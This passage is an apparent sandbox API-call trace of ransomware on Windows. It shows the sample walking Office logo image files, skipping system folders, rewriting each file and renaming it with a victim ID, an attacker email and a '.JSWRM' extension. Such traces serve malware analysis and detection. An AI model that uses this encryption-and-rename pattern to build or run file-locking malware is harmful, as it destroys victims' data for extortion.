lpUsedDefaultChar=0x0) returned 5 [0132.733] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.733] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.734] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3935) returned 1 [0132.734] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.734] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xf50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xf50, lpOverlapped=0x0) returned 1 [0132.782] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.782] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xf50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xf50, lpOverlapped=0x0) returned 1 [0132.782] CloseHandle (hObject=0x238) returned 1 [0132.782] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.784] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199947e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199947e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199947e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79a, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.contrast-white_scale-80.png", cAlternateFileName="GROOVE~3.PNG")) returned 1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2=".") returned 1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="..") returned 1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="...") returned 1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="windows") returned -1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="recovery") returned -1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="perflogs") returned -1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="documents and settings") returned 1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="system volume information") returned -1 [0132.785] lstrcmpiW (lpString1="GrooveLogo.contrast-white_scale-80.png", lpString2="msocache") returned -1 [0132.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-80.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-80.png", cchWideChar=38, lpMultiByteStr=0x22d260, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 38 [0132.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-80.png", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0132.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.contrast-white_scale-80.png", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.contrast-white_scale-80.png", lpUsedDefaultChar=0x0) returned 38 [0132.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.785] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.786] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1946) returned 1 [0132.786] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.786] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x790, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x790, lpOverlapped=0x0) returned 1 [0132.788] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.788] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x790, lpOverlapped=0x0) returned 1 [0132.788] CloseHandle (hObject=0x238) returned 1 [0132.788] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.contrast-white_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.contrast-white_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.789] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199947e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199947e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199ba9ea, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe5e, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.scale-100.png", cAlternateFileName="GR37CD~1.PNG")) returned 1 [0132.789] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2=".") returned 1 [0132.789] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="..") returned 1 [0132.789] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="...") returned 1 [0132.789] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="windows") returned -1 [0132.789] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="recovery") returned -1 [0132.789] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="perflogs") returned -1 [0132.789] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="documents and settings") returned 1 [0132.790] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0132.790] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="system volume information") returned -1 [0132.790] lstrcmpiW (lpString1="GrooveLogo.scale-100.png", lpString2="msocache") returned -1 [0132.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-100.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0132.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-100.png", cchWideChar=24, lpMultiByteStr=0x241060, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 24 [0132.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-100.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0132.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-100.png", cchWideChar=24, lpMultiByteStr=0x240fe8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-100.png", lpUsedDefaultChar=0x0) returned 24 [0132.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.791] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3678) returned 1 [0132.791] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.791] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xe50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xe50, lpOverlapped=0x0) returned 1 [0132.792] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.792] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xe50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xe50, lpOverlapped=0x0) returned 1 [0132.793] CloseHandle (hObject=0x238) returned 1 [0132.793] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.794] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199947e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199947e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199ba9ea, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13a7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.scale-140.png", cAlternateFileName="GR3AC7~1.PNG")) returned 1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2=".") returned 1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="..") returned 1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="...") returned 1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="windows") returned -1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="recovery") returned -1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="perflogs") returned -1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="documents and settings") returned 1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="system volume information") returned -1 [0132.794] lstrcmpiW (lpString1="GrooveLogo.scale-140.png", lpString2="msocache") returned -1 [0132.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-140.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0132.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-140.png", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 24 [0132.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-140.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0132.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-140.png", cchWideChar=24, lpMultiByteStr=0x2410d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-140.png", lpUsedDefaultChar=0x0) returned 24 [0132.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.795] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5031) returned 1 [0132.795] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.795] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x13a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x13a0, lpOverlapped=0x0) returned 1 [0132.832] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.833] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x13a0, lpOverlapped=0x0) returned 1 [0132.833] CloseHandle (hObject=0x238) returned 1 [0132.833] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.835] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199947e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199947e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199ba9ea, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1add, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.scale-180.png", cAlternateFileName="GR7C96~1.PNG")) returned 1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2=".") returned 1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="..") returned 1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="...") returned 1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="windows") returned -1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="recovery") returned -1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="perflogs") returned -1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="documents and settings") returned 1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="system volume information") returned -1 [0132.835] lstrcmpiW (lpString1="GrooveLogo.scale-180.png", lpString2="msocache") returned -1 [0132.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-180.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0132.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-180.png", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 24 [0132.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-180.png", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0132.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-180.png", cchWideChar=24, lpMultiByteStr=0x240f48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-180.png", lpUsedDefaultChar=0x0) returned 24 [0132.835] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0132.837] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6877) returned 1 [0132.837] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.837] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1ad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x1ad0, lpOverlapped=0x0) returned 1 [0132.838] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.839] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x1ad0, lpOverlapped=0x0) returned 1 [0132.839] CloseHandle (hObject=0x238) returned 1 [0132.839] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.840] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x199947e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x199947e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x199947e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb09, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="GrooveLogo.scale-80.png", cAlternateFileName="GROOVE~4.PNG")) returned 1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2=".") returned 1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="..") returned 1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="...") returned 1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="windows") returned -1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="recovery") returned -1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="perflogs") returned -1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="documents and settings") returned 1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="system volume information") returned -1 [0132.840] lstrcmpiW (lpString1="GrooveLogo.scale-80.png", lpString2="msocache") returned -1 [0132.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-80.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-80.png", cchWideChar=23, lpMultiByteStr=0x2412e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 23 [0132.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-80.png", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0132.840] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GrooveLogo.scale-80.png", cchWideChar=23, lpMultiByteStr=0x2411c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GrooveLogo.scale-80.png", lpUsedDefaultChar=0x0) returned 23 [0132.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\GrooveLogo.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\groovelogo.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 